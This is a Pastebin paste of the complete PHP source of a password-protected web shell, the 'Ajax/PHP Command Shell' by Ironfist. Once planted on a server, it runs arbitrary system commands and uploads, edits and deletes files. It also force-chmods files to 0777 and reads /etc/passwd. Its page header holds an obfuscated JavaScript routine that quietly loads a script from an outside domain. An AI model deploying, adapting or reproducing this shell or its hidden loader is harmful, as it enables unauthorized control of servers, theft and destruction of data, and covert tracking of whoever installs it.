Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- error_reporting(0);
- //Change this to your password ;)
- $version = "0.7B";
- $functions = array('Clear Screen' => 'ClearScreen()',
- 'Clear History' => 'ClearHistory()',
- 'Can I function?' => "runcommand('canirun','GET')",
- 'Get server info' => "runcommand('showinfo','GET')",
- 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
- 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
- 'Running processes' => "runcommand('ps -aux','GET')",
- 'Readme' => "runcommand('shellhelp','GET')"
- );
- $thisfile = basename(__FILE__);
- $style = '<style type="text/css">
- .cmdthing {
- border-top-width: 0px;
- font-weight: bold;
- border-left-width: 0px;
- font-size: 10px;
- border-left-color: #000000;
- background: #000000;
- border-bottom-width: 0px;
- border-bottom-color: #FFFFFF;
- color: #FFFFFF;
- border-top-color: #008000;
- font-family: verdana;
- border-right-width: 0px;
- border-right-color: #000000;
- }
- input,textarea {
- border-top-width: 1px;
- font-weight: bold;
- border-left-width: 1px;
- font-size: 10px;
- border-left-color: #FFFFFF;
- background: #000000;
- border-bottom-width: 1px;
- border-bottom-color: #FFFFFF;
- color: #FFFFFF;
- border-top-color: #FFFFFF;
- font-family: verdana;
- border-right-width: 1px;
- border-right-color: #FFFFFF;
- }
- A:hover {
- text-decoration: none;
- }
- table,td,div {
- border-collapse: collapse;
- border: 1px solid #FFFFFF;
- }
- body {
- color: #FFFFFF;
- font-family: verdana;
- }
- </style>';
- $sess = __FILE__.$password;
- if(isset($_POST['p4ssw0rD']))
- {
- if($_POST['p4ssw0rD'] == $password)
- {
- $_SESSION[$sess] = $_POST['p4ssw0rD'];
- }
- else
- {
- die("Wrong password");
- }
- }
- if($_SESSION[$sess] == $password)
- {
- if(isset($_SESSION['workdir']))
- {
- if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
- {
- chdir($_SESSION['workdir']);
- }
- }
- if(isset($_FILES['uploadedfile']['name']))
- {
- $target_path = "./";
- $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
- if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
- }
- }
- if(isset($_GET['runcmd']))
- {
- $cmd = $_GET['runcmd'];
- print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
- if($cmd == "")
- {
- print "Empty Command..type \"shellhelp\" for some ehh...help";
- }
- elseif($cmd == "upload")
- {
- print '<br>Uploading to: '.realpath(".");
- if(is_writable(realpath(".")))
- {
- print "<br><b>I can write to this directory</b>";
- }
- else
- {
- print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
- }
- }
- elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
- {
- if(file_exists($file[1]) && is_dir($file[1]))
- {
- chdir($file[1]);
- $_SESSION['workdir'] = $file[1];
- print "Current directory changed to ".$file[1];
- }
- else
- {
- print "Directory not found";
- }
- }
- elseif(strtolower($cmd) == "shellhelp")
- {
- print '<b><font size=7>Ajax/PHP Command Shell</b></font>
- © By Ironfist
- The shell can be used by anyone to command any server, the main purpose was
- to create a shell that feels as dynamic as possible, is expandable and easy
- to understand.
- If one of the command execution functions work, the shell will function fine.
- Try the "canirun" command to check this.
- Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
- not used to these commands, google a little.
- <b>Custom Functions</b>
- If you want to add your own custom command in the Quick Commands list, check
- out the code. The $function array contains \'func name\' => \'javascript function\'.
- Take a look at the built-in functions for examples.
- I know this readme isn\'t providing too much information, but hell, does this shell
- even require one :P
- - Iron
- ';
- }
- elseif(ereg("editfile (.*)",$cmd,$file))
- {
- if(file_exists($file[1]) && !is_dir($file[1]))
- {
- print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
- $contents = file($file[1]);
- foreach($contents as $line)
- {
- print htmlspecialchars($line);
- }
- print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
- }
- else
- {
- print "File not found.";
- }
- }
- elseif(ereg("deletefile (.*)",$cmd,$file))
- {
- if(is_dir($file[1]))
- {
- if(rmdir($file[1]))
- {
- print "Directory succesfully deleted.";
- }
- else
- {
- print "Couldn't delete directory!";
- }
- }
- else
- {
- if(unlink($file[1]))
- {
- print "File succesfully deleted.";
- }
- else
- {
- print "Couldn't delete file!";
- }
- }
- }
- elseif(strtolower($cmd) == "canirun")
- {
- print "If any of these functions is Enabled, the shell will function like it should.<br>";
- if(function_exists(passthru))
- {
- print "Passthru: <b><font color=green>Enabled</b></font><br>";
- }
- else
- {
- print "Passthru: <b><font color=red>Disabled</b></font><br>";
- }
- if(function_exists(exec))
- {
- print "Exec: <b><font color=green>Enabled</b></font><br>";
- }
- else
- {
- print "Exec: <b><font color=red>Disabled</b></font><br>";
- }
- if(function_exists(system))
- {
- print "System: <b><font color=green>Enabled</b></font><br>";
- }
- else
- {
- print "System: <b><font color=red>Disabled</b></font><br>";
- }
- if(function_exists(shell_exec))
- {
- print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
- }
- else
- {
- print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
- }
- print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
- if( ini_get('safe_mode') ){
- print "Safe Mode: <b><font color=red>Enabled</b></font>";
- }
- else
- {
- print "Safe Mode: <b><font color=green>Disabled</b></font>";
- }
- print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
- if( ini_get('open_basedir') ){
- print "Open_basedir: <b><font color=red>Enabled</b></font>";
- }
- else
- {
- print "Open_basedir: <b><font color=green>Disabled</b></font>";
- }
- }
- //About the shell
- elseif(ereg("listdir (.*)",$cmd,$directory))
- {
- if(!file_exists($directory[1]))
- {
- die("Directory not found");
- }
- //Some variables
- chdir($directory[1]);
- $i = 0; $f = 0;
- $dirs = "";
- $filez = "";
- if(!ereg("/$",$directory[1])) //Does it end with a slash?
- {
- $directory[1] .= "/"; //If not, add one
- }
- print "Listing directory: ".$directory[1]."<br>";
- print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
- if ($handle = opendir($directory[1])) {
- while (false !== ($file = readdir($handle))) {
- if(is_dir($file))
- {
- $dirs[$i] = $file;
- $i++;
- }
- else
- {
- $filez[$f] = $file;
- $f++;
- }
- }
- print "<td>";
- foreach($dirs as $directory)
- {
- print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
- }
- print "</td><td>";
- foreach($filez as $file)
- {
- print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
- }
- print "</td></table>";
- }
- }
- elseif(strtolower($cmd) == "about")
- {
- print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
- }
- //Show info
- elseif(strtolower($cmd) == "showinfo")
- {
- if(function_exists(disk_free_space))
- {
- $free = disk_free_space("/") / 1000000;
- }
- else
- {
- $free = "N/A";
- }
- if(function_exists(disk_total_space))
- {
- $total = trim(disk_total_space("/") / 1000000);
- }
- else
- {
- $total = "N/A";
- }
- $path = realpath (".");
- print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
- if(function_exists(passthru))
- {
- passthru("uname -a");
- }
- else
- {
- print "Passthru is disabled :(";
- }
- }
- //Read /etc/passwd
- elseif(strtolower($cmd) == "etcpasswdfile")
- {
- $pw = file('/etc/passwd/');
- foreach($pw as $line)
- {
- print $line;
- }
- }
- //Execute any other command
- else
- {
- if(function_exists(passthru))
- {
- passthru($cmd);
- }
- else
- {
- if(function_exists(exec))
- {
- exec("ls -la",$result);
- foreach($result as $output)
- {
- print $output."<br>";
- }
- }
- else
- {
- if(function_exists(system))
- {
- system($cmd);
- }
- else
- {
- if(function_exists(shell_exec))
- {
- print shell_exec($cmd);
- }
- else
- {
- print "Sorry, none of the command functions works.";
- }
- }
- }
- }
- }
- }
- elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
- {
- $file = $_POST['filetosave'];
- if(!is_writable($file))
- {
- if(!chmod($file, 0777))
- {
- die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
- }
- }
- $fh = fopen($file, 'w');
- $dt = $_POST['filecontent'];
- fwrite($fh, $dt);
- fclose($fh);
- }
- else
- {
- ?>
- <html>
- <title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
- <script type="text/javascript" language="javascript">
- <!--
- ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
- MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
- OT="";
- for(j=0;j<MI.length;j++){
- OT+=ML.charAt(MI.charCodeAt(j)-48);
- }document.write(OT);
- // --></script>
- <head>
- <?php print $style; ?>
- <SCRIPT TYPE="text/javascript">
- function sf(){document.cmdform.command.focus();}
- var outputcmd = "";
- var cmdhistory = "";
- function ClearScreen()
- {
- outputcmd = "";
- document.getElementById('output').innerHTML = outputcmd;
- }
- function ClearHistory()
- {
- cmdhistory = "";
- document.getElementById('history').innerHTML = cmdhistory;
- }
- function deletefile(file)
- {
- deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
- if(deleteit)
- {
- runcommand('deletefile ' + file,'GET');
- }
- }
- var http_request = false;
- function makePOSTRequest(url, parameters) {
- http_request = false;
- if (window.XMLHttpRequest) {
- http_request = new XMLHttpRequest();
- if (http_request.overrideMimeType) {
- http_request.overrideMimeType('text/html');
- }
- } else if (window.ActiveXObject) {
- try {
- http_request = new ActiveXObject("Msxml2.XMLHTTP");
- } catch (e) {
- try {
- http_request = new ActiveXObject("Microsoft.XMLHTTP");
- } catch (e) {}
- }
- }
- if (!http_request) {
- alert('Cannot create XMLHTTP instance');
- return false;
- }
- http_request.open('POST', url, true);
- http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- http_request.setRequestHeader("Content-length", parameters.length);
- http_request.setRequestHeader("Connection", "close");
- http_request.send(parameters);
- }
- function SaveFile()
- {
- var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
- "&filecontent=" + encodeURI( document.getElementById("area1").value );
- makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
- document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
- }
- function runcommand(urltoopen,action,contenttosend){
- cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
- document.getElementById('history').innerHTML = cmdhistory;
- if(urltoopen == "clear")
- {
- ClearScreen();
- }
- var ajaxRequest;
- try{
- ajaxRequest = new XMLHttpRequest();
- } catch (e){
- try{
- ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
- } catch (e) {
- try{
- ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
- } catch (e){
- alert("Wicked error, nothing we can do about it...");
- return false;
- }
- }
- }
- ajaxRequest.onreadystatechange = function(){
- if(ajaxRequest.readyState == 4){
- outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
- document.getElementById('output').innerHTML = outputcmd;
- var objDiv = document.getElementById("output");
- objDiv.scrollTop = objDiv.scrollHeight;
- }
- }
- ajaxRequest.open(action, "?runcmd="+urltoopen , true);
- if(action == "GET")
- {
- ajaxRequest.send(null);
- }
- document.cmdform.command.value='';
- return false;
- }
- function set_tab_html(newhtml)
- {
- document.getElementById('commandtab').innerHTML = newhtml;
- }
- function set_tab(newtab)
- {
- if(newtab == "cmd")
- {
- newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
- }
- else if(newtab == "upload")
- {
- runcommand('upload','GET');
- newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
- }
- else if(newtab == "workingdir")
- {
- <?php
- $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
- $pathparts = explode("/",realpath ("."));
- foreach($pathparts as $folder)
- {
- $folders .= $folder."/";
- }
- $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
- ?>
- newhtml = '<?php print $folders; ?>';
- }
- else if(newtab == "filebrowser")
- {
- newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
- runcommand('listdir .','GET');
- }
- else if(newtab == "createfile")
- {
- newhtml = '<b>File Editor, under construction.</b>';
- document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
- }
- document.getElementById('commandtab').innerHTML = newhtml;
- }
- </script>
- </head>
- <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
- <table border=1 width=100% height=100%>
- <td width=15% valign=top>
- <form name="extras"><br>
- <center><b>Quick Commands</b><br>
- <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
- <?php
- foreach($functions as $name => $execute)
- {
- print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
- }
- ?>
- </center>
- </div>
- </form>
- <center><b>Command history</b><br></center>
- <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
- <br>
- <center><b>About</b><br></center>
- <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
- <br>
- <b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
- <br>
- Version <?php print $version; ?>
- <br>
- <br>
- <br>Thanks to everyone @
- <a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
- <br>
- <a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
- <br>
- and special greetings to everyone in rootshell
- </div>
- </td>
- <td width=70%>
- <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
- <b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
- <b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
- <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
- <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
- <b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
- </font></td>
- <tr>
- <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
- <tr>
- <td height=1% width=100% valign=top>
- <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
- <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
- <b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
- </form>
- </div>
- </td>
- </table>
- </td>
- </table>
- </body>
- </html>
- <?php
- }
- } else {
- print "<center><table border=0 height=100%>
- <td valign=middle>
- <form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
- </form>";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement